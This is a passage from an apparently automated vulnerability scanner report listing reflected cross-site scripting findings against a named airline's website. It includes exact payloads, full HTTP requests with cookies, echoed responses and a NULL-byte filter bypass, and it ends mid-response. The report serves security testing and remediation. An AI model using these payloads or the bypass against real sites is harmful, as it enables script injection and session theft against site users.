1.22. https://www.aa.com/dwr/interface/CountryLanguageSelectAjaxUtils.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/interface/CountryLanguageSelectAjaxUtils.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f74e4<script>alert(1)</script>c7dba976432 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/interface/CountryLanguageSelectAjaxUtils.jsf74e4<script>alert(1)</script>c7dba976432 HTTP/1.1
Host: www.aa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

Response

HTTP/1.1 501 Not Implemented
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 90
Server: On-Demand Router/1.0
X-Cnection: Close
Date: Sun, 13 Nov 2011 13:33:45 GMT
Connection: keep-alive
Vary: Accept-Encoding

No class by name: CountryLanguageSelectAjaxUtilsf74e4<script>alert(1)</script>c7dba976432

1.23. https://www.aa.com/dwr/interface/HomePageMyReservationsAjaxAction.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/interface/HomePageMyReservationsAjaxAction.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 47a9b<script>alert(1)</script>b5f7e5bf5d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/interface/HomePageMyReservationsAjaxAction.js47a9b<script>alert(1)</script>b5f7e5bf5d2 HTTP/1.1
Host: www.aa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

Response

HTTP/1.1 501 Not Implemented
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 92
Server: On-Demand Router/1.0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-Cnection: Close
Date: Sun, 13 Nov 2011 13:44:27 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=0000REhCEOkRsgFrmIsDwsxWe-D:15mbfaj65; Path=/

No class by name: HomePageMyReservationsAjaxAction47a9b<script>alert(1)</script>b5f7e5bf5d2

1.24. https://www.aa.com/dwr/interface/HomePageMyReservationsAjaxAction.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/interface/HomePageMyReservationsAjaxAction.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 71755<script>alert(1)</script>ad50b7b51f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /dwr/interface/HomePageMyReservationsAjaxAction.js71755<script>alert(1)</script>ad50b7b51f2 HTTP/1.1
Host: www.aa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

Response

HTTP/1.1 501 Not Implemented
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 92
Server: On-Demand Router/1.0
X-Cnection: Close
Date: Sun, 13 Nov 2011 13:33:47 GMT
Connection: keep-alive
Vary: Accept-Encoding

No class by name: HomePageMyReservationsAjaxAction71755<script>alert(1)</script>ad50b7b51f2

1.25. https://www.aa.com/dwr/interface/HomePageUtils.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/interface/HomePageUtils.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a4d6d<script>alert(1)</script>96f9002ee6f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/interface/HomePageUtils.jsa4d6d<script>alert(1)</script>96f9002ee6f HTTP/1.1
Host: www.aa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

Response

HTTP/1.1 501 Not Implemented
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 73
Server: On-Demand Router/1.0
X-Cnection: Close
Date: Sun, 13 Nov 2011 13:33:45 GMT
Connection: keep-alive
Vary: Accept-Encoding

No class by name: HomePageUtilsa4d6d<script>alert(1)</script>96f9002ee6f

1.26. https://www.aa.com/dwr/interface/SmartSuggestAjaxUtils.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/interface/SmartSuggestAjaxUtils.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2a89d<script>alert(1)</script>a73c2318f6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/interface/SmartSuggestAjaxUtils.js2a89d<script>alert(1)</script>a73c2318f6a HTTP/1.1
Host: www.aa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

Response

HTTP/1.1 501 Not Implemented
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 81
Server: On-Demand Router/1.0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-Cnection: Close
Date: Sun, 13 Nov 2011 13:44:19 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=0000PNSl-VygweoWPd52FR0lDXi:15mbfaj65; Path=/

No class by name: SmartSuggestAjaxUtils2a89d<script>alert(1)</script>a73c2318f6a

1.27. https://www.aa.com/homePage.do [locale parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /homePage.do

Issue detail

The value of the locale request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad672"><img%20src%3da%20onerror%3dalert(1)>62d6135677e was submitted in the locale parameter. This input was echoed as ad672"><img src=a onerror=alert(1)>62d6135677e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /homePage.do?selectedTab=aa-hp-myAccount&locale=en_USad672"><img%20src%3da%20onerror%3dalert(1)>62d6135677e HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:37:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 152000


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-USAD672"><IMG SRC=A ONERROR=ALERT(1)>62D6135677E" xml:lang="en-USAD672">
...[SNIP]...

1.28. https://www.aa.com/i18n/aboutUs/customerCommitment/main.jsp [anchorEvent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/aboutUs/customerCommitment/main.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bab0"><img%20src%3da%20onerror%3dalert(1)>ab7e280b476 was submitted in the anchorEvent parameter. This input was echoed as 8bab0"><img src=a onerror=alert(1)>ab7e280b476 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/aboutUs/customerCommitment/main.jsp?anchorEvent=false8bab0"><img%20src%3da%20onerror%3dalert(1)>ab7e280b476&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 100055


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="false8bab0"><img src=a onerror=alert(1)>ab7e280b476" />
...[SNIP]...

1.29. https://www.aa.com/i18n/aboutUs/customerCommitment/main.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/aboutUs/customerCommitment/main.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ccd3"><img%20src%3da%20onerror%3dalert(1)>4addc91e2ca was submitted in the from parameter. This input was echoed as 5ccd3"><img src=a onerror=alert(1)>4addc91e2ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/aboutUs/customerCommitment/main.jsp?anchorEvent=false&from=Nav5ccd3"><img%20src%3da%20onerror%3dalert(1)>4addc91e2ca HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 100058


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav5ccd3"><img src=a onerror=alert(1)>4addc91e2ca" />
...[SNIP]...

1.30. https://www.aa.com/i18n/aboutUs/customerCommitment/main.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/aboutUs/customerCommitment/main.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18c3a"><img%20src%3da%20onerror%3dalert(1)>936d577a2b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 18c3a"><img src=a onerror=alert(1)>936d577a2b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/aboutUs/customerCommitment/main.jsp?18c3a"><img%20src%3da%20onerror%3dalert(1)>936d577a2b8=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 99995


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="18c3a"><img src=a onerror=alert(1)>936d577a2b8" value="1" />
...[SNIP]...

1.31. https://www.aa.com/i18n/amrcorp/newsroom/main.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.aa.com
Path:   /i18n/amrcorp/newsroom/main.jsp

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00a3d55<a>0b9c80dc06c was submitted in the REST URL parameter 1. This input was echoed as a3d55<a>0b9c80dc06c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /%00a3d55<a>0b9c80dc06c/amrcorp/newsroom/main.jsp HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
X-Cnection: Close
Date: Sun, 13 Nov 2011 13:42:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40578


<HTML>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<!-- Meta Tags -->
<meta http-equiv="Expires" content="0"/>
<meta http-equiv="Pragma" content="n
...[SNIP]...
</B>/.a3d55<a>0b9c80dc06c/amrcorp/newsroom/main.jsp<BR>
...[SNIP]...

1.32. https://www.aa.com/i18n/productsGifts/giftCard.jsp [anchorEvent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/productsGifts/giftCard.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c6ad"><img%20src%3da%20onerror%3dalert(1)>3a2ba7b173 was submitted in the anchorEvent parameter. This input was echoed as 4c6ad"><img src=a onerror=alert(1)>3a2ba7b173 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/productsGifts/giftCard.jsp?anchorEvent=false4c6ad"><img%20src%3da%20onerror%3dalert(1)>3a2ba7b173&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113351


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="false4c6ad"><img src=a onerror=alert(1)>3a2ba7b173" />
...[SNIP]...

1.33. https://www.aa.com/i18n/productsGifts/giftCard.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/productsGifts/giftCard.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bb09"><img%20src%3da%20onerror%3dalert(1)>ad272008981 was submitted in the from parameter. This input was echoed as 5bb09"><img src=a onerror=alert(1)>ad272008981 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/productsGifts/giftCard.jsp?from=Nav5bb09"><img%20src%3da%20onerror%3dalert(1)>ad272008981 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113274


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav5bb09"><img src=a onerror=alert(1)>ad272008981" />
...[SNIP]...

1.34. https://www.aa.com/i18n/productsGifts/giftCard.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/productsGifts/giftCard.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5c88"><img%20src%3da%20onerror%3dalert(1)>091eb12a06a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5c88"><img src=a onerror=alert(1)>091eb12a06a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/productsGifts/giftCard.jsp?f5c88"><img%20src%3da%20onerror%3dalert(1)>091eb12a06a=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113262


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="f5c88"><img src=a onerror=alert(1)>091eb12a06a" value="1" />
...[SNIP]...

1.35. https://www.aa.com/i18n/reservations/paymentOptions/cashPayments.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/cashPayments.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34945"><img%20src%3da%20onerror%3dalert(1)>f6d3077519a was submitted in the from parameter. This input was echoed as 34945"><img src=a onerror=alert(1)>f6d3077519a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/reservations/paymentOptions/cashPayments.jsp?from=Nav34945"><img%20src%3da%20onerror%3dalert(1)>f6d3077519a HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108450


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav34945"><img src=a onerror=alert(1)>f6d3077519a" />
...[SNIP]...

1.36. https://www.aa.com/i18n/reservations/paymentOptions/cashPayments.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/cashPayments.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ba81"><img%20src%3da%20onerror%3dalert(1)>8abe4a6248 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1ba81"><img src=a onerror=alert(1)>8abe4a6248 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/reservations/paymentOptions/cashPayments.jsp?1ba81"><img%20src%3da%20onerror%3dalert(1)>8abe4a6248=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108436


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="1ba81"><img src=a onerror=alert(1)>8abe4a6248" value="1" />
...[SNIP]...

1.37. https://www.aa.com/i18n/reservations/paymentOptions/creditDebitCards.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/creditDebitCards.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 339a6"><img%20src%3da%20onerror%3dalert(1)>e90081f9fe0 was submitted in the from parameter. This input was echoed as 339a6"><img src=a onerror=alert(1)>e90081f9fe0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/reservations/paymentOptions/creditDebitCards.jsp?from=Nav339a6"><img%20src%3da%20onerror%3dalert(1)>e90081f9fe0 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108750


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav339a6"><img src=a onerror=alert(1)>e90081f9fe0" />
...[SNIP]...

1.38. https://www.aa.com/i18n/reservations/paymentOptions/creditDebitCards.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/creditDebitCards.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3298d"><img%20src%3da%20onerror%3dalert(1)>e6f307b5db5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3298d"><img src=a onerror=alert(1)>e6f307b5db5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/reservations/paymentOptions/creditDebitCards.jsp?3298d"><img%20src%3da%20onerror%3dalert(1)>e6f307b5db5=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108738


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="3298d"><img src=a onerror=alert(1)>e6f307b5db5" value="1" />
...[SNIP]...

1.39. https://www.aa.com/i18n/reservations/paymentOptions/electronicChecks.jsp [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/electronicChecks.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eba1"><img%20src%3da%20onerror%3dalert(1)>eb546ab6c04 was submitted in the from parameter. This input was echoed as 8eba1"><img src=a onerror=alert(1)>eb546ab6c04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/reservations/paymentOptions/electronicChecks.jsp?from=Nav8eba1"><img%20src%3da%20onerror%3dalert(1)>eb546ab6c04 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109738


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav8eba1"><img src=a onerror=alert(1)>eb546ab6c04" />
...[SNIP]...

1.40. https://www.aa.com/i18n/reservations/paymentOptions/electronicChecks.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/electronicChecks.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cee2e"><img%20src%3da%20onerror%3dalert(1)>a952f7fc535 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cee2e"><img src=a onerror=alert(1)>a952f7fc535 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/reservations/paymentOptions/electronicChecks.jsp?cee2e"><img%20src%3da%20onerror%3dalert(1)>a952f7fc535=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
